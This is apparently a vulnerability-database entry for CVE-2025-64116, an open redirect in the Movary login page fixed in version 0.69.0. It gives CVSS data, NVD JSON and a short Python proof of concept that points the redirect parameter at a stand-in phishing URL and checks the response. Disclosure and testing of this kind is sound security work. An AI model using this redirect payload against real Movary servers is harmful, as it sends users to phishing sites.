Security Vulnerability Report
中文
CVE-2025-64116 CVSS 6.1 MEDIUM

CVE-2025-64116

Published: 2025-10-30 18:15:34
Last Modified: 2025-12-08 15:34:42

Description

Movary is a web application to track, rate and explore your movie watch history. Prior to 0.69.0, the login page accepts a redirect parameter without validation, allowing attackers to redirect authenticated users to arbitrary external sites. This vulnerability is fixed in 0.69.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:* - VULNERABLE
Movary < 0.69.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64116 PoC - Movary Open Redirect Vulnerability # Target: Movary < 0.69.0 # Attack Type: Open Redirect def test_open_redirect(base_url): """ Test for open redirect vulnerability in Movary login page """ # Malicious redirect target malicious_domain = "https://evil.example.com/phishing" # Construct malicious URL vulnerable_url = f"{base_url}/login?redirect={malicious_domain}" print(f"[*] Testing vulnerable URL: {vulnerable_url}") try: # Send GET request to login page with redirect parameter response = requests.get(vulnerable_url, allow_redirects=False) # Check if redirect occurs if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') print(f"[+] Found redirect to: {location}") if malicious_domain in location: print("[!] VULNERABLE: Open redirect confirmed!") return True print("[-] Not vulnerable or redirect not found") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False # Example usage if __name__ == "__main__": target = "http://target-movary-server.com" test_open_redirect(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64116", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:33.527", "lastModified": "2025-12-08T15:34:41.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Movary is a web application to track, rate and explore your movie watch history. Prior to 0.69.0, the login page accepts a redirect parameter without validation, allowing attackers to redirect authenticated users to arbitrary external sites. This vulnerability is fixed in 0.69.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.69.0", "matchCriteriaId": "19118997-9D9D-427F-9958-F4471F9D0CFB"}]}]}], "references": [{"url": "https://github.com/leepeuker/movary/commit/716f703b4464ffdb0365c406f3660d275495769f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/leepeuker/movary/pull/713", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/leepeuker/movary/security/advisories/GHSA-7q72-x26x-7f8g", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/leepeuker/movary/security/advisories/GHSA-7q72-x26x-7f8g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}